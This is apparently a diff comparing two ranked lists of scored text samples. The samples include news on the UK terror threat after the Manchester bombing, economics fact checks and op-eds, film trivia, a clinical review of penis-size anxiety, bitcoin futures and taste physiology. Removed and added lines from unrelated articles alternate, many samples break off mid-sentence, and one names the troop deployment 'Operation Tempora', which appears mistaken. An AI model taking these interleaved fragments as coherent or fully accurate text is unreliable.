+================================================================================ +Rank = 74; Score = 329728.0 +<|begin_of_text|>BRITISH PRIME MINISTER Theresa May has raised the country’s terror threat level from severe to critical. -Gross domestic product, or GDP, is used to measure the health of a country’s or state’s economy. It’s the total value of all goods and services. +Critical is the highest level possible in the UK and means that an attack is “expected imminently”. -Our research +The threat level is decided by the Joint Terrorism Analysis Centre (JTAC). The last time it reached critical was in 2007, having been severe since 2014. -A campaign spokeswoman for Villaraigosa pointed us to 2015 GDP figures from the International Monetary Fund. +Prime Minister Theresa May said that the decision had been made following investigations today. -We used the same data in July to verify that California, with a GDP of nearly $2.5 trillion, had the sixth-largest economy behind the United States, China, Japan, Germany and the United Kingdom. +“It has now been concluded that the threat levels should be increased for the time being. -California Gov. Jerry Brown’s administration released GDP figures in June showing the state had jumped two spots in these unique world rankings ahead of France and Brazil and into sixth place behind the United Kingdom. +“This means that [the JTAC's] assessment is not only that an attack is highly likely, but that another attack is imminent -In our July fact check, we noted that when adjusted for California’s very high cost of living, the state’s GDP drops several places. This led us to our Mostly True rating for the claim, which we define as "accurate but needs clarification or additional information." +“It is a possibility we cannot ignore that there is a wider group of individuals linked to this attack.” -To come up with a combined GDP for three West Coast states, we -================================================================================ -Rank = 76; Score = 671744.0 -<|begin_of_text|>The International Energy Association (IEA) announced a plan today to make 60 million barrels of oil available to the market over the next month from the Strategic Petroleum Reserve (SPR), in response to the disturbance in supplies from Libya. Half of this oil is to come from the SPR of the United States; the rest is to come from SPRs of other members of OECD. +May added that military personnel will be deployed to Britain’s streets to support armed police officers under Operation Tempora. -Both the amount and the timing of the release are strange. The amount of the release is equivalent to 2 million barrels a day. This is actually more than the Libyan disruption took off the market, which was about 1.4 million barrels a day. The disruption first took place in February, and oil prices have been declining since early May, so the timing is strange, as well. +Armed personnel will be visible at big events such as concerts and sporting events, she said. -What the timing of the oil release is close to, is the end of Quantitative Easing 2 (QE2). QE2 is the United States’ program of buying back debt to keep interest rates low and the dollar low, which began November 2010 and is scheduled to end June 30, 2011. It was intended to stimulate the economy, and oil prices have indeed risen during most of the time it was in effect. +Attack -Today’s announcement of the SPR oil-release program was made by IEA, but a person can’t help but wonder if the United States wasn’t heavily involved in the decision. After all, the United States is the largest member of the IEA, and is making half the release itself. Also, when Ben Bernanke spoke yesterday, he didn’t have any financial replacement for QE2. The release of oil from the SPR looks as if it is the latest attempt to kick-start the economy, both of the US and other OECD countries, using yet another approach. +Source: PA Wire/PA Images -If we look at oil price and the S&P 500 Index (Figure 2), there has been a significant correlation between the two since late 2008. When oil prices drop, so does the S&P 500 Index, most likely since this means the economy is “tanking.” When oil prices rise, so does the S&P 500 Index, indicating the economy is working well. +The move comes as 22 people were confirmed dead after last night’s suicide bomb attack on an Ariana Grande concert in Manchester. -The problem is that high oil prices soon sow the seed of their own destruction. Once the oil price starts getting high (over $85 is high, over $110 is very high), the high oil prices start causing recessionary influences, because citizens have to cut back on other goods, when oil and food prices start rising. Oil and food prices usually rise and fall +Manchester police identified the suspect behind the attack as 22-year-old Salman Abedi. + +Police staged an armed raid on a Manchester address believed to be where Abedi lived, carrying out a controlled explosion to gain entry after arresting a 23-year-old man earlier Tuesday in connection with the attack. + +“A single terrorist detonated his improvised explosive device near one of the exits of the venue, deliberately choosing the time and place to cause maximum carnage and to kill and injure indiscriminately,” May said after an emergency ministerial meeting. + +The attack was the deadliest in Britain since July 7, 2005 when four suicide bombers inspired by Al-Qaeda attacked London’s transport system during rush hour, killing 52 people and wounding 700 more. + +The Islamic State group has claimed responsibility for the attack.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> ================================================================================ -Rank = 77; Score = 671744.0 -<|begin_of_text|>Originally, the term “movies” did not mean films, but the people who made them. It was generally used with disdain by early Hollywood locals who disliked the “invading” Easterners. [1] +Rank = 75; Score = 327680.0 +<|begin_of_text|>This post will mark the beginning of a series on Steve Keen’s book Debunking Economics. My first impression after reading his book was that it was chalk full of great ideas and solid criticisms of “neoclassical” economics as it is currently taught to undergraduate and graduate students. I’m not always fond of Keen’s tone, but isn’t some crank. I’m writing these posts in order to better retain the ideas and concepts expressed in the book, as well as to spark discussion. Other bloggers have also written about and summarized this book, and I will be linking to these posts as well. I’ll say that I don’t really have anything new to add to what has been perviously said, and I am doing this for my benefit. -The first film ever made in Hollywood was D.W. Griffith’s 1910 In Old California, a biograph melodrama about a Spanish maiden (Marion Leonard) who has an illegitimate son with a man who later becomes governor of California. It was shot in two days. [6] +Keen’s begins his criticism of neoclassical (micro) economics in chapter 3, which centers around the “Law of Demand”, i.e. the idea that market demand curves don’t necessarily slope downwards. This is in direct contrast to what is taught in an “Intro to Microeconomics” course, and subsequent economic courses use the assumption when explaining other concepts. -When Horace and Daeida Wilcox founded Hollywood in 1887, they hoped it would become a religious community. Prohibitionists, they banned liquor from the town and offered free land to anyone willing to build a church. [25] +Market Demand Curves Don’t Slope Downwards -The most filmed author is William Shakespeare, including straight film versions, modern adaptations, ( West Side Story [1961], The Lion King [1994], etc.) and Shakespeare parodies. [1] +Economists look at demand curves to see how demand for a commodity changes as its price changes, while the consumer’s income remains constant. When you don’t make that assumption, things get complicated quickly. The decrease of price in one good raises the real income of the consumer (the income effect), allowing the consumer to increase the consumption of all goods, not just the good that has become cheaper. So in the case of Giffen Goods, because the rise in price of one good make another good unaffordable, you have a paradox where demand increases as prices rise. Consider necessary, luxury, and normal goods, and you have a very complicated picture and some interesting looking demand curves. -The shortest dialogue script since the introduction of talkies was written for Mel Brook’s Silent Movie (1976), which has only one spoken word throughout: “Non.” [1] +This is why economists make the distinction between the income effect and the substitution effect (if price falls, consumption rises and vice versa). The substitution effect is always negative and it’s what economists use to establish the “Law of Demand”. However, the income effect can be both negative and positive. So economists neutralize the income effect by using a Hicksian compensated demand function. The consumer is given a level of utility and a set of prices. The consumer then minimizes the amount of money that he/she would need to spend to achieve that given level of utility, thus separating the income effect and the substitution effect. + +But once you introduce more than one agent into +================================================================================ +Rank = 76; Score = 327680.0 +<|begin_of_text|>By Indiaspend As many as 45 of India’s top 50 districts that offer affordable, formal financial services are in four south Indian states—with 30 concentrated in Tamil Nadu and Kerala—according to CRISIL Inclusix, a measure of financial inclusion. The top five states/union territories are Puducherry, Kerala, Tamil Nadu, Goa and Chandigarh. These states drove a surge in India’s financial inclusion index, which improved to 50.1 (of a possible 100) at the end of 2013 from 42.8 at the end of 2012. The index does not take into account the Prime Minister’s Jan Dhan Yojana (People’s Wealth Scheme). With over 140 million new bank accounts opened since August 2014, the index will likely be boosted further in 2015. CRISIL, a Mumbai-based ratings agency, defines financial inclusion as “the extent of access by all sections of society to formal financial services such as credit, deposit, insurance and pension services”. CRISIL’s Inclusix is a relative index that combines three parameters of basic financial services—branch penetration, deposit penetration and credit penetration. A score of 100 indicates the ideal state for each of the three parameters. CRISIL has included district-wise data from micro-finance institutions (MFIs) to calculate the index for the first time, covering 652 districts in 35 states and union territories. Bank Services Are Spreading As many as 117 million savings bank accounts were opened in the financial year 2013, almost 50% more than the 79 million that opened the previous year. The total operative bank accounts in the country at the end of 2013 were 820 million as against 703 million in 2012, an increase of 17%, the fastest growth in four years. However, growth in credit accounts declined due to a reduction in small-borrower accounts to 102 million in 2013 from 109 million in 2012. “The decline was primarily observed in five metro districts: Delhi, Kolkata, Mumbai, Mumbai Suburban and Bangalore Urban. This could be attributed to book-cleaning exercises by banks and closure of dormant credit-card accounts,” the report said. South leads; North-East at bottom but moves ahead With an increase of 40% in bank credit accounts, the northern state of Jammu & Kashmir saw its Inclusix score improve to 45.2. The state also saw high deposit and branch scores +================================================================================ +Rank = 77; Score = 325632.0 +<|begin_of_text|>NEW YORK (Reuters) - Nasdaq Inc plans to launch a futures contract based on bitcoin in 2018, making it the third exchange operator to plan U.S. derivatives contracts linked to the digital currency, a source with knowledge of the matter said on Wednesday. -The first motion picture to depict a non-pornographic sex act was Extase (1933) starring Hedwig Kiesler, known later as Hedy Lamarr (1913-2000). Her character flees from an impotent husband, runs naked through the woods, bathes, and then has sex with a young engineer in a hut.l [17] +FILE PHOTO: A copy of bitcoin standing on PC motherboard is seen in this illustration picture, October 26, 2017. REUTERS/Dado Ruvic/File Photo -Though photos have survived, the movie A Daughter of the Gods is now considered lost +The price of bitcoin topped $11,000 on Wednesday less than a day after passing the $10,000 mark and has increased more than 10-fold in value so far this year, prompting concerns of a bubble. -The first nude scene in a major motion picture was of swimmer and actress Annette Kellerman (1887-1975) in A Daughter of the Gods (1916). [17] +CME Group, the world’s largest derivatives exchange, and CBOE Holdings, have both said they plan to launch futures products based on bitcoin this year, pending regulatory approval, helping fuel the crypto-currency’s rally. -The earliest known American pornographic film is the 1915 A Free Ride, a.k.a. A Grass Sandwich. The film was directed by “A. Wise Guy” and was written by “Will She.” [17] +While Nasdaq does not have a hard date set for its product, the transatlantic exchange operator has offered an exchange-traded note based on bitcoin on its Stockholm exchange since 2015. -The Western Hero most portrayed on screen has been William Frederick Cody, a.k.a. Buffalo Bill, followed by William Bonny, a.k.a. Billy the Kid. [17] +Nasdaq has teamed up with New York-based money manager VanEck to develop the futures contract, which will be cleared by the Options Clearing Corporation. The OCC clears all Nasdaq futures products, the source said. -The first African-American to play a leading role in a feature film was Sam Lucas (1850-1916) who was cast in the title role of Uncle Tom’s Cabin (1914). The first African-American actor to make a career in films was Noble Johnson (1881-1978). [17] +VanEck had applied to the U.S. Securities and Exchange Commission (SEC) this year to launch a bitcoin-related exchange-traded fund, but withdrew the request in September after speaking with SEC staff, according to a regulatory filing. -The American Humane -================================================================================ -Rank = 78; Score = 659456.0 -<|begin_of_text|>Wow, did you see the new jobs numbers? Unemployment is down to 5.1%. In the current definition of full employment (during the 1960’s it was a 4% unemployment rate) we are getting near that point. In fact, the unemployment rate is now lower than it was anytime during the Reagan presidency. We have had 67 consecutive months of job growth. The unemployment rate has dropped almost 5% from the high point of the Obama administration in October 2009. With all this good news why are things so bad? +The SEC requested that VanEck wait until the underlying instruments in which the ETF planned to primarily invest - bitcoin futures contracts - become available for investment, the filing said. -You may have heard something about a controversy regarding the unemployment numbers. There is focus on such matters as underemployment which for example having someone with a college degree waiting tables or bartending for lack of any quality opportunities for a person with their educational qualifications. Or you may have heard about the many people working part-time jobs due to lack of full-time opportunities or employers attempting to circumvent the rules established by Obamacare which states that a full-time employee reaches that status at 30 hours per week. +A representative for VanEck was not immediately available for comment. -What we really need to spotlight is the crushing economic effect of a lower labor participation rate (LPR). There are now 100 million Americans over the age of 16 that are not working. The Obama Administration keeps running out the deceit that this is because of all the baby boomers retiring. The fact is that the labor force participation rate for the age group 16 to 24 is only 55.1%. That is a reduction of over 10% from 66% during the 1990’s. It is also down over 5% (60.8%) from 2005. Sure myopic minimum wage increases are harming the employment of this age group with the least work experience, but that is not the total explanation. +One of the ways the Nasdaq futures product will differ from CME’s and CBOE’s is that it will be based on an index that takes in prices from more than 50 bitcoin exchanges, the source said. -The Obama manipulation gets worse because the LPR is lower for the prime working years of 25-54 years old. In 2000 the LPR for this age group was almost 85%. It was down to 83% when the recession started, but has now plummeted to 80.7%. It is clear the baby boomers are not the only source of reduction in the LPR. +CME has said it’s bitcoin future will be based on the CF Bitcoin Reference Rate (BRR), a once-a-day reference rate of the U.S. dollar price of bitcoin, that currently takes prices from four bitcoin exchanges. CBOE will price its bitcoin future off the Gemini Trust, the digital currency exchange founded by brothers Cameron and Tyler Winklevoss. -You may wonder why this is such a big deal. The LPR for September 2015 was 62.4%. That is 3.7% less than August, 2005 exactly ten years earlier. One can argue this reduction in rate has to do with the “Great Recession.” Not true. If you review the +The SEC in March denied a request for CBOE to list what would have been the first U.S. ETF built to track bitcoin.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> ================================================================================ -Rank = 79; Score = 659456.0 -<|begin_of_text|>The male is often troubled by concerns that his penis is not large enough to satisfy his partner or himself. He is ashamed to have others view his penis, especially in the flaccid state. Such concerns might be unfounded in reality and might be a presentation of social anxiety or some other clinical problem, such as erectile dysfunction. Concern over the size of the penis, when such concern becomes excessive, might present as the ‘small penis syndrome’, an obsessive rumination with compulsive checking rituals, body dysmorphic disorder, or as part of a psychosis. However, it is often a worry that can be described as within the normal experience of many men. Various potential causal factors are considered. A thorough assessment, normalizing the worry and then exploring the treatment options in detail with the man, is essential to allow the matter to be consolidated satisfactorily within the male ego. +Rank = 78; Score = 325632.0 +<|begin_of_text|>Image copyright Getty Images Image caption Singapore has been moving up the ranks of the world's most expensive cities to live in over the last decade -Abbreviations SPS small penis syndrome BDD body dysmorphic disorder (dysmorphophobia) ED erectile dysfunction CBT cognitive behavioural therapy SSRI selective serotonin reuptake inhibitor. +Singapore has topped 131 cities globally to become the world's most expensive city to live in 2014, according to the Economist Intelligence Unit (EIU). -INTRODUCTION The penis, particularly in its erect state, is a symbol of masculinity. In many cultures it has come to symbolise attributes such as ‘largeness, strength, endurance, ability, courage, intelligence, knowledge, dominance over men, possession of women; a symbol of loving and being loved’. A review [1] is recommended which describes Indian Sadhus using weights, Dayak men in Borneo piercing the glans and then inserting items in the resultant holes to stimulate the partner, and the Topinama of Brazil, who encourage poisonous snakes to bite their penis to make it enlarge (for 6 months!). Some of these concepts date back over many thousands of years, and there is evidence that prehistoric cave dwellers attributed the symbolic values of strength and power to penile size, as well as those of virility and fertility, a process also recommended in the Kama Sutra [2]. Given the historical context it is perhaps no surprise that even today many men place great importance on the size of their penis. Hegemonic masculinity is defined by attributes such as physical strength, heterosexuality with authority over women and other men, showing no emotions (such as remorse and uncertainty, which might suggest vulnerability), economic independence, and an ability to demonstrate sexual ‘conquest’. While most men do not embody all of these qualities, society supports hegemonic masculinity within most of its institutions [3]. Given this historical and cultural background, it is perhaps unsurprising that for -================================================================================ -Rank = 80; Score = 655360.0 -<|begin_of_text|>"We cut our deficits by more than half." +The city's strong currency combined with the high cost of running a car and soaring utility bills contributed to Singapore topping the list. -In 2012, PolitiFact twice rated True claims that President Barack Obama failed to keep a promise to cut federal deficits in half by the end of his first term. +It is also the most expensive place in the world to buy clothes. -At that point, the budget gap topped a trillion bucks and Republican congressmen called out Obama because the deficit had been reduced by just 15 percent. +Singapore replaces Tokyo, which topped the list in 2013. -But there was the president at Laborfest 2014 in Milwaukee proclaiming "we cut our deficits by more than half." +Other cities making up the top five most expensive cities to live in are Paris, Oslo, Zurich and Sydney, with Tokyo falling to sixth place. -In his Sept. 1, 2014 speech, the president ticked off for union supporters a list of major policy decisions he contends helped boost the economy and improve the government’s bottom line. +The EIU's Worldwide Cost of Living Survey is a relocation tool that uses New York city as a base. It looks at more than 400 individual prices. -We can’t cover all of those here, but the deficit claim grabbed our attention. +Top 5 most expensive cities Image copyright Getty Images Singapore, Singapore Paris, France Oslo, Norway Zurich, Switzerland Sydney, Australia -Has it really been cut in half? +Soaring Asia -The White House Office of Management and Budget pointed us to a chart prepared by that office in 2013 as proof of Obama's claim. +The top 10 cities this year have been dominated by Asian and Australasian cities as well as some in Europe. -It compares the yearly deficits under Obama, expressed -- as they often are -- as a share of the nation’s entire economy, which is measured by the Gross Domestic Product. +"Improving sentiment in structurally expensive European cities combined with the continued rise of Asian hubs means that these two regions continue to supply most of the world's most expensive cities," said the editor of the report, Jon Copestake. -At the start of Obama’s term, the chart showed, the figure was 9.2 percent. The latest figure was 4.1 percent. +"But Asian cities also continue to make up many of the world's cheapest, especially in the Indian subcontinent." -That appears to back Obama's statement. +Most Asian cities that top the list are there for predominantly higher costs of groceries. Tokyo is still at the top of the list for everyday food items. -But let's examine this in detail. +Inexpensive India -To do that, we reviewed figures published by the Congressional Budget Office as well as the White House’s Office of Management and Budget. We also consulted with independent fiscal experts. +However, not all Asian cities are tough on the wallet. -The baseline year for comparison is fiscal year 2009, which ended Sept. 30 of that year. This was the last budget from President George W. Bush, as Obama took office in January of that year. +India's major cities - including Mumbai and New Delhi - were found to be among the least expensive in the world. -The most recent complete fiscal year is 2013. +Mumbai's prices are kept low by large income inequality. -Those are the same years Obama's chart showed. +The low wages of many of the city's workers keep spending low, and government subsidies have helped them stay that way. -Our analysis showed the drop easily topped 50 percent, and was actually somewhat higher than Obama's chart would indicate. +Outside of the subcontinent, Damascus in Syria saw the largest drop, becoming the fourth cheapest city in the world as the country's ongoing conflict has led to plummeting prices. -As a share of the economy, we found -- and our experts confirmed -- the drop was from 9.8 percent in 2009 to 4.1 percent in 2013. +Media playback is unsupported on your device Media caption Watch: Toby Iles from the Economist Intelligence Unit (EIU) explains to Sharanjit Leyl why Singapore is the most expensive city to live in -Obama’s chart actually reflects a lower deficit figure for 2009, and therefore a lower share of GDP, 9.2%. +While the EIU's survey takes into account the cost of living, other firms employ different research methods. -That’s because instead of using the actual 2009 deficit of $1.4 trillion, Obama lowers it by the $200 billion in increased deficit spending that he -- not Bush -- pushed through in the stimulus plan to address the crisis that became the +Mercer conducts research to determine the most expensive cities for ================================================================================ -Rank = 81; Score = 655360.0 -<|begin_of_text|>Despite several quarters of rising GDP, and the upbeat exertions of Administration spokespeople, the National Bureau of Economic Research (NBER) has yet to announce the recession is over. Their reluctance is well-founded. It is beginning to dawn on even the more optimistic analysts that the tepid growth we have seen over the past three quarters is only an interlude in an otherwise grave and prolonged recession. Moreover, the respite will cost dearly as the United States has racked up a generation worth of debt for dubious benefit. +Rank = 79; Score = 325632.0 +<|begin_of_text|>CHENNAI: The Enforcement Directorate, which enforces the Prevention of Money Laundering Act (PMLA), has provisionally attached properties worth Rs 12,000 crore in the last 15 months, believed to be the proceeds of laundered money, data released by the government shows. This is more than what the department attached in the decade from 2005.In a written reply to an unstarred question on Friday, minister of state for finance Santosh Kumar Gangwar said that in the last one year, properties worth Rs 11,032.27 crore were attached by the ED after issuing 175 Provisional Attachment Orders (PAO). In comparison, the total value of assets attached from 2005-2015 was Rs 9003.26 crore, statistics on ED website show. In the first three months of the current financial year, Rs 965.84 crore has been attached. The total cumulative attachments would be around Rs 22,000 crore as of June 30 this year, said sources in the department. The figures of properties attached in 2016-17 zoomed due to the Vijay Mallya case, in which properties worth close to Rs 10,000 crore were attached, sources said.More than half of the total searches and a third of the total arrests by the department across the country were effected in the last 15 months, statistics show. Some of these highprofile cases and searches were in Tamil Nadu; for instance the Sekhar Reddy case and Madurai granite mining. The ED is an organisation which goes after big names accused of corruption. The PMLA is a stringent law, where the onus is on the accused to prove that the attached properties are bought from known sources of income, say sources. The ED has been given a free hand to dig up dirty money, said sources. This, they added, reflected in the figures.Sources in the department said that these measures were taken in coordination with other investigative agencies like Income Tax Investigation Wing and Central Bureau of Investigation (CBI). A task force on shell companies had been created by the ministry of corporate affairs which involves all these departments. The ED is tracking shell companies through which crores of rupees are transferred out of the country. In April, ED sleuths arrested in Chennai a 36-year-old man who had allegedly routed Rs 78 crore through six shell companies.As of July 12, 1.62 lakh shell companies had been struck off the Registrar of Companies (RoC). +================================================================================ +Rank = 80; Score = 323584.0 +<|begin_of_text|>The gustatory system creates the human sense of taste, allowing us to perceive different flavors from substances that we consume as food and drink. Gustation, along with olfaction (the sense of smell), is classified as chemoreception. Because it functions by reacting with molecular chemical compounds in a given substance. Specialized cells in the gustatory system that are located on the tongue are called taste buds, and they sense tastants (taste molecules). The taste buds send the information after coming in contact with food from the tastants to the brain, where a molecule is processed as a certain taste. There are five main tastes: bitter, salty, sweet, sour, and umami (savory). All the varieties of flavor we experience are a combination of some or all of these tastes. -The paltry number of new jobs currently being created still fall far short of the 375,000 per month needed to offset the 125,000 new entrants to the job market due to population growth and to erode the 8 million people laid off in the past year alone. Meanwhile, house prices continue to fall and credit continues to contract. With retail sales dropping in June and the Leading Economic Index (LEI) standing at minus 7.7 per cent, it should be clear that the US economy is heading back towards recession, following a temporary distortion created by some $1.3 trillion in federal stimulus. In short, the stimulus has failed. +The sense of taste is transduced by taste buds. Which are clusters of 50-100 taste receptor cells located in the tongue, soft palate, epiglottis, pharynx, and esophagus. The tongue is the main sensory organ of the gustatory system. The tongue contains papillae, or specialized epithelial cells, which have taste buds on their surface. There are three types of papillae with taste buds in the human gustatory system: -While there can be no doubt that an increase in government spending will result in a boost to GDP figures, the evidence of history shows that such growth is short-lived. Unfortunately as leaders around the world look to tighten the reins on out of control spending, President Obama and his Democratic supporters in Congress believe that their stimulus actions have succeeded and should be redoubled. Armed with nothing more than faith in government and a belief that spending is both a means and an end, it appears that the US stimulus policy will continue. The net result of these efforts will not be a more vibrant economy, but the perpetuation of fear and confusion in the business community and the continuing expansion of deficits that will lead inevitably to higher taxes. +Loading... -The more indebted an economy becomes, the greater the burden that must be borne by the wealth-creating private sector. Indeed, at the present rate of government debt-financing, the private sector will have to contribute some $2 trillion each year in interest costs alone. This money must be raised by taxation or inflation. +fungiform papillae, which are mushroom-shaped and located at the tip of the tongue; -This week, in response to their fears of increased regulations, higher taxes, and greater government stewardship of the economy, discontent among business leaders flared into the open. Gathering in Washington, leaders of the US Chamber of Commerce lashed out at current regulatory changes in healthcare. In other forums, business executives and investors questioned the efficacy of the -================================================================================ -Rank = 82; Score = 643072.0 -<|begin_of_text|>In a report issued today on the data broker industry, the Federal Trade Commission finds that data brokers operate with a fundamental lack of transparency. The Commission recommends that Congress consider enacting legislation to make data broker practices more visible to consumers and to give consumers greater control over the immense amounts of personal information about them collected and shared by data brokers. +foliate papillae, which are ridges and grooves toward the back of the tongue; -The report, “Data Brokers: A Call for Transparency and Accountability” is the result of a study of nine data brokers, representing a cross-section of the industry, undertaken by the FTC to shed light on the data broker industry. Data brokers obtain and share vast amounts of consumer information, typically behind the scenes, without consumer knowledge. Data brokers sell this information for marketing campaigns and fraud prevention, among other purposes. Although consumers benefit from data broker practices which, for example, help enable consumers to find and enjoy the products and services they prefer, data broker practices also raise privacy concerns. +circumvallate papillae, which are circular-shaped and located in a row just in front of the end of the tongue. -“The extent of consumer profiling today means that data brokers often know as much – or even more – about us than our family and friends, including our online and in-store purchases, our political and religious affiliations, our income and socioeconomic status, and more,” said FTC Chairwoman Edith Ramirez. “It’s time to bring transparency and accountability to bear on this industry on behalf of consumers, many of whom are unaware that data brokers even exist.” +You can’t taste food unless it’s mixed with your saliva -The report finds that data brokers collect and store billions of data elements covering nearly every U.S. consumer. Just one of the data brokers studied holds information on more than 1.4 billion consumer transactions and 700 billion data elements and another adds more than 3 billion new data points to its database each month. +Each taste bud is flask-like in shape and formed by two types of cells: supporting cells and gustatory cells. Gustatory cells are short-lived and are continuously regenerating. They each contain a taste pore at the surface of the tongue which is the site of sensory transduction. Though there are small differences in sensation, all taste buds, no matter their location, can respond to all types of taste.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 81; Score = 319488.0 +<|begin_of_text|>To see how it works, consider a topic I know well: the recent history of inflation scares. -Among the report’s findings: +More than five years have passed since many conservatives started warning that the Federal Reserve, by taking action to contain the financial crisis and boost the economy, was setting the stage for runaway inflation. And, to be fair, that wasn’t a crazy position to take in 2009; I could have told you it was wrong (and, in fact, I did), but you could see where it was coming from. -Data brokers collect consumer data from extensive online and offline sources, largely without consumers’ knowledge, ranging from consumer purchase data, social media activity, warranty registrations, magazine subscriptions, religious and political affiliations, and other details of consumers’ everyday lives. +Over time, however, as the promised inflation kept failing to arrive, there should have come a point when the inflationistas conceded their error and moved on. -Consumer data often passes through multiple layers of data brokers sharing data with each other. In fact, seven of the nine data brokers in the Commission study had shared information with another data broker in the study. +In fact, however, few did. Instead, they mostly doubled down on their predictions of doom, and some moved on to conspiracy theorizing, claiming that high inflation was already happening, but was being concealed by government officials. -Data brokers combine online and offline data to market to consumers online. +Why the bad behavior? Nobody likes admitting to mistakes, and all of us — even those of us who try not to — sometimes engage in motivated reasoning, selectively citing facts to support our preconceptions. -Data brokers combine and analyze data about consumers to make inferences about them, including potentially sensitive inferences such as those related to ethnicity, income, religion, political leanings, age, and health conditions. Potentially sensitive categories from the study are “Urban Scramble” and “Mobile Mixers,” both of which include a high +But hard as it is to admit one’s own errors, it’s much harder to admit that your entire political movement got it badly wrong. Inflation phobia has always been closely bound up with right-wing politics; to admit that this phobia was misguided would have meant conceding that one whole side of the political divide was fundamentally off base about how the economy works. So most of the inflationistas have responded to the failure of their prediction by becoming more, not less, extreme in their dogma, which will make it even harder for them ever to admit that they, and the political movement they serve, have been wrong all along.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_o